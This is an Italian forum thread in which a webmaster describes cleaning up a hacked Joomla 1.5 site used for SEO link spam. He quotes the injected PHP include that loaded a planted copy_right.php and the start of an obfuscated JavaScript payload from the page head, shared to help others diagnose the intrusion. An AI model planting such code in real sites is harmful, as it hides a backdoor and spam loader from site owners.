Autore Topic: Sito bucato?  (Letto 1421 volte)

Offline davide73

  • Esploratore
  • **
  • Post: 111
    • Mostra profilo
Sito bucato?
« il: 09 Nov 2010, 10:09:16 »
Ciao,

facendo una analisi su google ho scoperto che nell'indice compaiono pagine non inerenti al sito, che hanno link del tipo a seguire:

modules/com_comprofiler/fruit-of-the-loom-tees-p-943.html

adesso per accedendo al back-end non vendo nulla di strano ed il sito fnziona comunque correttamente "apparentemente"

la versione e vecchia: 1.5.12

ed installato oltre a joomla c' Frontpage SlideShow e Joomap

dove e come posso eliminare l'errore, oltre ovviamente ad aggiornare la mia versione del core?

da dove sono entrati che io non uso comunity builder?

saluti e grazie delle risposte. Davide.

mau_develop

  • Visitatore
Re:Sito bucato?
« Risposta #1 il: 09 Nov 2010, 10:17:34 »

Offline davide73

  • Esploratore
  • **
  • Post: 111
    • Mostra profilo
Re:Sito bucato?
« Risposta #2 il: 09 Nov 2010, 22:37:07 »
Ringraziando M. per l'attenzione e il post scritto, a seguire la mia esperienza che magari serva a qualcuno:

innanzitutto, non so come sono entrati, probabilmente la versione non aggiornata del core, quindi importante aggiornare (me lo dico ovviamente anche da solo).

Verificare eventuali aggiornamenti dei moduli e componenti e plugin etc installati.

Anche se poi magari per colpa del mio ISP che non nomino per ovvie ragioni.

Comunque:

1. hanno inserito uno script che richiamava un modulo sempre da loro inserito nel file INDEX.PHP della template in uso.

Ovviamente tale richiamo v eliminato, nel mio caso visto che comunque con attenzione mantengo un backup dei file e del DB in locale, stato veole rimettere il MIO file originale.

V comunque letto ed intepretato lo script per capire cosa fa, in questo caso stato facile:

<?php @include_once("./".preg_replace("/[^\/]*\//","../",preg_replace("/^\//","",preg_replace("/[^\/]+$/","",$_SERVER["REQUEST_URI"])))."./".preg_replace("/[^\/]*\//","../",preg_replace("/^\//","",preg_replace("/[^\/]+$/","",$_SERVER["REQUEST_URI"])))."./".preg_replace("/[^\/]*\//","../",preg_replace("/^\//","",preg_replace("/[^\/]+$/","",$_SERVER["REQUEST_URI"])))."/modules/com_k2/copy_right.php");?>

dove chiaramente bisogna seguire e leggere il file copy_right.php e quindi da questo vedere cosa ealtro implicato.

Inoltre c'era questo strano script nelle prime righe tra i tag <head>:

ne scrivo solo l'inizio:
type="text/javascript"> <!--         $=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+"        \\"+$.__$+$.$$_+$.___+$.$_$_+"\\"+$.__$+$.$__+$.$$$+$.$$$_+"_"+(![]+"")[$._$_]+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$_$+$.$$_+"\\"+$.__$+$.$_$+$._$$+"\\"+$.__$+$.$$_+$._$$+" \\"+$.$$$+$.$_$+" []\\"+$.$$$+$._$$+"\\"+$.__$+$._$_+"        "+$.$$$$+$._+"\\"+$.__$+$.$_$+$.$$_+$.$$__+$.__+"\\"+$.__$+$.$_$+$.__$+$._$+"\\"+$.__$+$.$_$+$.$$_+" \\"+$.__$+$.$$_+$._$$+$.$$$_+$.__+"\\"+$.__$+$.___+$.$$$+(![]+"")[$._$_]+$._$+$.$_$$+$.$_$_+(![]+"")[$._$  etc.

2. erano state inserite 2 cartelle nella cartella modules: com_comprofiles e mod_k2

ovviamente ho rimosso tutto il loro contenuto dal server, cosi che non ho pi gli strani link tra le mie pagine.

Sicuramente l'unico scopo e di tipo SEO al fine che gli si indicizzino link sfruttando il tuo sito, considerate che all'interno delle funzioni calcolato che vengano presi 244 caratteri (circa 20 link) alla volta da un file di testo txt che pesava oltre 5mb, il ch significa: una enormit di link!! e che io nelle pagine del sito non li vedevo e tanto meno nel pannello.

Adesso ho reinviato la sitemap a Google sperando che cancelli quanto prima le indicizzaioni fatte a quei link INVADENTI ripulendo la mia chache, lo faro anche su Yahoo, Ask e Bing che sono i motori che mi risultano pi intelligenti e con gli strumenti per farlo! se conoscete altri motori con attenzione ai webmaster ditemeli che ci passo!!

Me ne sono accorto grazie al comando site:www.xxxx.com da google che mi porta oltre 500 link su un sito di 30/40 pagine, strano no??

Spero che questo post sia di aiuto, mentre invito il moderatore qual'ora io abbia commesso un abuso ho abbia sbagliato inserendo script e dettagli di cancellarlo o avvisarmi che lo cancello.

Saluti e meno male che me andata bene sta volta v ........
« Ultima modifica: 09 Nov 2010, 22:39:15 da davide73 »

 

Host

Torna su